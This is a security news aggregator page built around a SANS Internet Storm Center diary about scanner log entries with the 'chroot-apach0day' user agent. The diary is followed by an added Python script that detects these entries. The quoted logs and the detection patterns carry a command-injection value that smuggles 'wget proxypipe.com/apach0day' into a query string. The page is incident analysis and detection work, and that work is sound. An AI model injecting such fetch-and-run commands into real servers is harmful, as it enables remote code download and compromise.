Hackin9

What InfoSec can learn from the insurance industry
iT News (blog)
That kind of raw data - rather than the vendor-sponsored and spun surveys that nobody trusts - would make life a great deal easier for my infosec acquaintance and colleagues. It also makes (yet another) strong case for mandatory data breach reporting.

 
A network testbed being constructed just south of San Francisco will help carriers and vendors develop standards for better cloud services, the CloudEthernet Forum says.
 
 
If you like to send messages via Facebook when you're on the move, get ready to download a new app.
 

Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day  

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day".

There are a couple of other security-related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
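A detection pass over web server log lines in the combined format shown above, as an added example that is not part of the diary or of any ISC tooling. The sample log embeds the three requests quoted in the entry plus one constructed benign line; the indicators (the "apach0day" user-agent substring, the ";wget" in the query string, and the "BINDSHELL" claim in the last user agent) are taken from the entry, and the stage tag is pulled from the path segment in front of the wget.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format; the trailing extra "-" field in the ISC lines is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Indicators from the diary entry: the user agent and the wget fetch embedded in the query string.
UA_MARKER = "apach0day"
WGET_IN_QUERY = re.compile(r";\s*wget\s+", re.IGNORECASE)
STAGE_TAG = re.compile(r"/([^/;]+);\s*wget", re.IGNORECASE)

# Sample input: the three requests quoted in the entry plus one constructed benign request.
SAMPLE_LOG = [
    '162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"',
    '162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"',
    '162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"',
    '10.0.0.5 - - [28/Jul/2014:06:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (constructed benign line)" "-"',
]

def parse_line(line):
    """Split one combined-format line into fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the reasons an entry matches the chroot-apach0day scanner pattern (empty if none)."""
    reasons = []
    path = unquote(entry["path"])          # %20 -> space, so the wget becomes visible
    if UA_MARKER in entry["ua"].lower():
        reasons.append("user-agent:" + entry["ua"])
    if WGET_IN_QUERY.search(path):
        reasons.append("wget-in-query")
    if "BINDSHELL" in entry["ua"].upper():
        reasons.append("bindshell-claim")
    return reasons

def scan(lines):
    """Run classify() over every parsable line and report the hits with their stage tag."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            m = STAGE_TAG.search(unquote(entry["path"]))
            hits.append({"ip": entry["ip"], "ts": entry["ts"], "status": entry["status"],
                         "stage": m.group(1) if m else None, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["stage"], hit["reasons"])
```

The three matching lines come from a single source address and carry three different stage tags, which is the timeline a responder would want to see before deciding whether the 301 responses meant the requests never reached anything that could run the wget.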
 
Linux Kernel SCTP NULL Pointer Dereference Denial of Service Vulnerability
 
Cisco Prime Data Center Network Manager CVE-2014-3329 Cross Site Scripting Vulnerability
 
Facebook earlier this summer sparked criticism over a study in which it manipulated the feeds of some of its users, but the dating site OkCupid says what Facebook did is normal, and that in fact it has run its own user-behavior tests.
 
In the hot market for big-data products and services, sometimes even competitors must work together for the common good.
 
It seems obvious, but complaining about bad service can really make a difference.
 
Mozilla today ditched the "interim" label for Chris Beard and appointed him CEO.
 
Thanks to the rise of mobile gaming and 4K video, LP-DDR4 memory will reach smartphones and tablets close to two years earlier than expected, an analyst said.
 
With a comet rushing toward Mars, NASA scientists are working to protect their robotic orbiters from being damaged by comet debris.
 
Smarter contextual awareness, 4K video and augmented reality are just some of the new technologies that will be offered by smartphones and tablets over the next year or so, according to Qualcomm's product blueprints.
 
New tariffs imposed by the U.S. on Chinese imports of solar cells and (for the first time) Taiwan has infuriated some in the solar power industry who believe the steep taxes will adversely affect businesses and consumers.
 
Skybox Security Multiple Security Vulnerabilities
 
RETIRED: Skybox Security Multiple Denial of Service Vulnerabilities
 
Rimini Street is continuing to rapidly grow revenue for its third-party software support business despite its ongoing litigation with Oracle.
 
Oracle Java SE CVE-2014-4247 Remote Security Vulnerability
 
The preview of Apple's OS X Yosemite public beta last week resulted in a tripling of the upgrade's share of online traffic.
 
Google has launched a new project, dubbed the Baseline Study, that seeks to develop a greater understanding of what it means to be healthy.
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Multiple vulnerabilities have been found in OpenSSL, possibly allowing remote attackers to execute arbitrary code.
 
LinuxSecurity.com: Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 6.2 Advanced Update Support. The Red Hat Security Response Team has rated this update as having [More...]
 
WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities
 
ManageEngine EventLog Analyzer '/event/j_security_check' Cross Site Scripting Vulnerability
 
vBulletin CVE-2014-5102 SQL Injection Vulnerability
 
Lime Survey Multiple Input Validation Vulnerabilities
 

Attackers have figured out a new way to get Amazon's cloud service to wage potent denial-of-service attacks on third-party websites—by exploiting security vulnerabilities in an open source search and analytics application known as Elasticsearch.

The power of Backdoor.Linux.Ganiw.a was documented earlier this month by researchers from antivirus provider Kaspersky Lab. Among other things, the trojan employs DNS amplification, a technique that vastly increases the volume of junk traffic being directed at a victim by abusing poorly secured domain name system servers. By sending DNS queries that are malformed to appear as if they came from the victim domain, DNS amplification can boost attack volume by 10-fold or more. The technique can be especially hard to block when distributed among thousands or hundreds of thousands of compromised computers.

Late last week, Kaspersky Lab expert Kurt Baumgartner reported that the DDoS bot is actively compromising Amazon Elastic Cloud Computing (EC2) hosts and very possibly those of competing cloud services. The foothold that allows the nodes to be hijacked is a vulnerability in 1.1.x versions of Elasticsearch, he said. The attackers are modifying proof-of-concept attack code for the vulnerability, indexed as CVE-2014-3120 in the Common Vulnerabilities and Exposures database, that gives them the ability to remotely execute powerful Linux commands through a bash shell window. The Gani backdoor, in turn, installs several other malicious scripts on compromised computers, including Backdoor.Perl.RShell.c and Backdoor.Linux.Mayday.g. The Mayday backdoor then floods sites with data packets based on the User Datagram Protocol.


 
Cisco WebEx Meetings Server CVE-2014-3305 Cross Site Request Forgery Vulnerability
 
Cisco WebEx Meetings Server 'user.php' Information Disclosure Vulnerability
 
Officials today from the China government appeared at four Microsoft offices, but the purpose of the visits was unclear.
 
Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers.
 
The launch of the Samsung Z, the first smartphone to run the Tizen OS, has been delayed indefinitely.
 
Microsoft's Office 365 'rent-not-buy' subscription service is at an annual revenue run-rate of more than half a billion dollars.
 
Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers.
 
McKenna Long & Aldridge faced a multi-faceted communications challenge that threatened to impede the company's technology adoption and office expansion.
 
Zarafa WebAccess and WebApp Local Information Disclosure Vulnerability
 
The Alice ruling clarifies patent-eligible software processes.
 
Martha Heller talks to Charles Shaver, CEO at Axalta Coating Systems, about how a business-savvy CIO and global systems help his company meet customer expectations.
 
Firefox users who don't like the changes to the browser's new tab page have multiple options.
 
[security bulletin] HPSBGN02936 rev.1 - HP and H3C VPN Firewall Module Products, Remote Denial of Service (DoS)
 
[SECURITY] [DSA 2990-1] cups security update
 
[SECURITY] [DSA 2991-1] modsecurity-apache security update
 
Barracuda Networks Spam&Virus Firewall v5.1.3 - Client Side Cross Site Vulnerability
 
Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account
 
Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account
 
The percentage of Microsoft current and former employees who approve of CEO Satya Nadella has dropped since the company announced layoffs.
 
Vulnerabilities in the Tails operating system could reveal your IP address, but you can avoid trouble by taking a couple of precautions.
 
A gold rush of next-gen authentication technologies yields biometric systems, ID bracelets, new standards and more.
 
CUPS Web Interface CVE-2014-5031 Incomplete Fix Local Privilege Escalation Vulnerability
 
CUPS Web Interface CVE-2014-5029 Incomplete Fix Local Privilege Escalation Vulnerability
 
CUPS Web Interface CVE-2014-5030 Incomplete Fix Local Privilege Escalation Vulnerability
 
CUPS Web Interface CVE-2014-3537 Local Privilege Escalation Vulnerability
 